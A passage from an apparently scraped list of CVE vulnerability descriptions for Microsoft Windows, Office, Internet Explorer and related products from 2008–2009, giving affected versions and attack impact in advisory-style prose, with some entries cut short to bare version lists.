ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Pointer Verification Vulnerability." [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0088] The WordPerfect 6.x Converter (WPFT632.CNV, 1998.1.27.0) in Microsoft Office Word 2000 SP3 and Microsoft Office Converter Pack does not properly validate the length of an unspecified string, which allows remote attackers to execute arbitrary code via a crafted WordPerfect 6.x file, related to an unspecified counter and control structures on the stack, aka "Word 2000 WordPerfect 6.x Converter Stack Corruption Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-7217] Microsoft Office 2008 for Mac, when running on Macintosh systems that restrict Office access to administrators, does not enforce this restriction for user ID 502, which allows local users with that ID to bypass intended security policy and access Office programs, related to permissions and ownership for certain directories. [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6063] Microsoft Word 2007, when the "Save as PDF" add-on is enabled, places an absolute pathname in the Subject field during an "Email as PDF" operation, which allows remote attackers to obtain sensitive information such as the sender's account name and a Temporary Internet Files subdirectory name. [CVE-2008-5912] An unspecified function in the JavaScript implementation in Microsoft Internet Explorer creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5416] Heap-based buffer overflow in Microsoft SQL Server 2000 SP4, 8.00.2050, 8.00.2039, and earlier [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5100] The strong name (SN) implementation in Microsoft .NET Framework 2.0.50727 relies on the digital signature Public Key Token embedded in the pathname of a DLL file instead of the digital signature of this file itself, which makes it easier for attackers to bypass Global Assembly Cache (GAC) and Code Access Security (CAS) protection mechanisms, aka MSRC ticket MSRC8566gs. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4844] Use-after-free vulnerability in the CRecordInstance::TransferToDestination function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via DSO bindings involving (1) an XML Island, (2) XML DSOs, or (3) Tabular Data Control (TDC) in a crafted HTML or XML document, as demonstrated by nested SPAN or MARQUEE elements, and exploited in the wild in December 2008. [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4837] Stack-based buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4493] Microsoft PicturePusher ActiveX control (PipPPush.DLL 7.00.0709), as used in Microsoft Digital Image 2006 Starter Edition, allows remote attackers to force the upload of arbitrary files by using the AddString and Post methods and a modified PostURL to construct an HTTP POST request. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4266] Array index vulnerability in Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP3 [CVE-2008-4265] Microsoft Office Excel 2000 SP3 allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet that contains a malformed object, which triggers memory corruption during the loading of records from this spreadsheet, aka "File Format Parsing Vulnerability." [CVE-2008-4264] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4256] The Charts ActiveX control in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "Charts Control Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4253] The FlexGrid ActiveX control in Microsoft Visual Basic 6.0, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, Office FrontPage 2002 SP3, and Office Project 2003 SP3 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-4110] Buffer overflow in the SQLVDIRLib.SQLVDirControl ActiveX control in Tools\Binn\sqlvdir.dll in Microsoft SQL Server 2000 (aka SQL Server 8.0) allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long URL in the second argument to the Connect method. NOTE: this issue is not a vulnerability in many environments, since the control is not marked as safe for scripting and would not execute with default Internet Explorer settings. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4032] Microsoft Office SharePoint Server 2007 Gold and SP1 and Microsoft Search Server 2008 do not properly perform authentication and authorization for administrative functions, which allows remote attackers to cause a denial of service (server load), obtain sensitive information, and "create scripts that would run in the context of the site" via requests to administrative URIs, aka "Access Control Vulnerability." [CVE-2008-4031] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4030] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4028] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4027] Double free vulnerability in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4026] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4025] Integer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4024] Microsoft Office Word 2000 SP3 and 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a Word document with a crafted lcbPlcfBkfSdt field in the File Information Block (FIB), which bypasses an initialization step and triggers an "arbitrary free," aka "Word Memory Corruption Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-4019] Integer overflow in the REPT function in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3956] orgchart.exe in Microsoft Organization Chart 2.00 allows user-assisted attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .opx file. [CVE-2008-3704] Heap-based buffer overflow in the MaskedEdit ActiveX control in Msmask32.ocx 6.0.81.69, and possibly other versions before 6.0.84.18, in Microsoft Visual Studio 6.0, Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allows remote attackers to execute arbitrary code via a long Mask parameter, related to not "validating property values with boundary checks," as exploited in the wild in August 2008, aka "Masked Edit Control Memory Corruption Vulnerability." [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2008-3477] Microsoft Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 does not properly validate data in the VBA Performance Cache when processing an Office document with an embedded object, which allows remote attackers to execute arbitrary code via an Excel file containing a crafted value, leading to heap-based buffer overflows, integer overflows, array index errors, and memory corruption, aka "Calendar Object Validation Vulnerability." [CVE-2008-3471] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3460] WPGIMP32.FLT in Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3021] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3020] Microsoft Office 2000 SP3 and XP SP3 [CVE-2008-3019] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3018] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3015] Integer overflow in gdiplus.dll in GDI+ in Microsoft Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a BMP image file with a malformed BitMapInfoHeader that triggers a buffer overflow, aka "GDI+ BMP Integer Overflow Vulnerability." [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3007] Argument injection vulnerability in a URI handler in Microsoft Office XP SP3, 2003 SP2 and SP3, 2007 Office System Gold and SP1, and Office OneNote 2007 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted onenote:// URL, aka "Uniform Resource Locator Validation Error Vulnerability." [CVE-2008-3006] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3005] Array index vulnerability in Microsoft Office Excel 2000 SP3 and 2002 SP3, and Office 2004 and 2008 for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted array index for a FORMAT record, aka the "Excel Index Array Vulnerability." [CVE-2008-3004] Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 [CVE-2008-3003] Microsoft Office Excel 2007 Gold and SP1 does not properly delete the PWD (password) string from connections.xml when a .xlsx file is configured not to save the remote data session password, which allows local users to obtain sensitive information and obtain access to a remote data source, aka the "Excel Credential Caching Vulnerability." [CVE-2008-2752] Microsoft Word 2000 9.0.2812 and 2003 11.8106.8172 does not properly handle unordered lists, which allows user-assisted remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .doc file. NOTE: some of these details are obtained from third party information. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2463] The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2244] Microsoft Office Word 2002 SP3 allows remote attackers to execute arbitrary code via a .doc file that contains malformed data, as exploited in the wild in July 2008, and as demonstrated by attachement.doc. [CVE-2008-1898] A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1547] Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1455] A "memory calculation error" in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP2, and 2007 through SP1 [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1434] Use-after-free vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via an HTML document with a large number of Cascading Style Sheets (CSS) selectors, related to a "memory handling error" that triggers memory corruption. [CVE-2008-1092] Buffer overflow in msjet40.dll before 4.0.9505.0 in Microsoft Jet Database Engine allows remote attackers to execute arbitrary code via a crafted Word file, as exploited in the wild in March 2008. NOTE: as of 20080513, Microsoft has stated that this is the same issue as CVE-2007-6026. [CVE-2008-1091] Unspecified vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via a Rich Text Format (.rtf) file with a malformed string that triggers a "memory calculation error" and a heap-based buffer overflow, aka "Object Parsing Vulnerability." [CVE-2008-1090] Unspecified vulnerability in Microsoft 